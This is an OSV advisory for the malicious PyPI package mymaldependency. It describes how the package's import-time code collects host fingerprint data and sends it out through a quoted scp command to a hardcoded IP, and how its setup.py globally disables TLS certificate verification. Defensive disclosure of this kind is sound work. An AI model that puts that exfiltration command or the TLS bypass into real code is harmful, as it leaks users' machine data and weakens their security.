MAL-2026-3694

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mymaldependency/MAL-2026-3694.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3694

Published

2026-05-12T07:43:18Z

Modified

2026-05-13T20:22:40.161523Z

Summary

Malicious code in mymaldependency (PyPI)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1)

MyMalDependencypackage/init.py executes on every import: it calls os.uname() and os.getcwd(), writes the results to./trans.txt in the installer's working directory, then invokes os.system('scp trans.txt Dell@192.168.129.164:E:\download') to ship the file to a hardcoded remote host. This is a one-way exfiltration of installer machine fingerprint data combined with unconsented shell command execution at import time. setup.py additionally disables TLS certificate verification globally (ssl.createdefaulthttpscontext = ssl.createunverifiedcontext), weakening the installer's trust posture during install. Source comments ('#恶意的依赖项' — Chinese for 'malicious dependency') and a startup print ('start mal dependency') explicitly declare malicious intent. Metadata is placeholder (author '1', UNKNOWN fields, description 'test to create package'). Regardless of whether the hardcoded private-range destination IP is currently reachable, the code pattern constitutes active attack behavior against anyone who imports the package.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-002298",
            "import_time": "2026-05-13T20:10:54.545210822Z",
            "sha256": "38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1",
            "source": "amazon-inspector",
            "modified_time": "2026-05-12T19:03:07Z",
            "versions": [
                "2.1.1"
            ]
        }
    ]
}

References

https://pypi.org/project/MyMalDependency/2.1.1/

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

PyPI / mymaldependency

Package

Name: mymaldependency; View open source insights on deps.dev
Purl: pkg:pypi/mymaldependency

Affected ranges

Affected versions

2.*

2.1.1

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "MyMalDependency_package/__init__.py",
            "sha256": "9a0b6296be73e06b09502381d5d21c2f6c47200e6223394c85a8efc8c2f15132",
            "tlsh": "f3e0c69120a81ba8410bf0ea8e0cc35a9812f45283b06020c700a4aece0a95da018b79"
        },
        {
            "path": "setup.py",
            "sha256": "839ec74ba3a23ad2966dfc00b5b13ab295dc8febf97cd1d578c369544eaa5bf5",
            "tlsh": "96e0c6328801f120a0c2b4eb09713039fb959c3a1420f0c433c1034916d518a9a0b81e"
        },
        {
            "path": "PKG-INFO",
            "sha256": "b075784fbf82fa60dce71ec1b095a4938d340343cab5ecb272c525f450d56d05",
            "tlsh": "6cd023c8b5739015d0b2465614d043e74dd0132878dd05d95840350417272c31b4e073"
        }
    ],
    "package_integrity": [
        {
            "filename": "MyMalDependency-2.1.1.tar.gz",
            "hashes": {
                "md5": "02bc3c535a8809858a1f8426302b94f8",
                "blake2b_256": "75ad00854a6201068d1160b864a38ffaece8351a7732243a9bc4d1aaa4a688d8",
                "sha256": "45899cb57dafe5b8e002a871c9084bb4a4d086f96904f2010d175f4455eac8f6"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mymaldependency/MAL-2026-3694.json"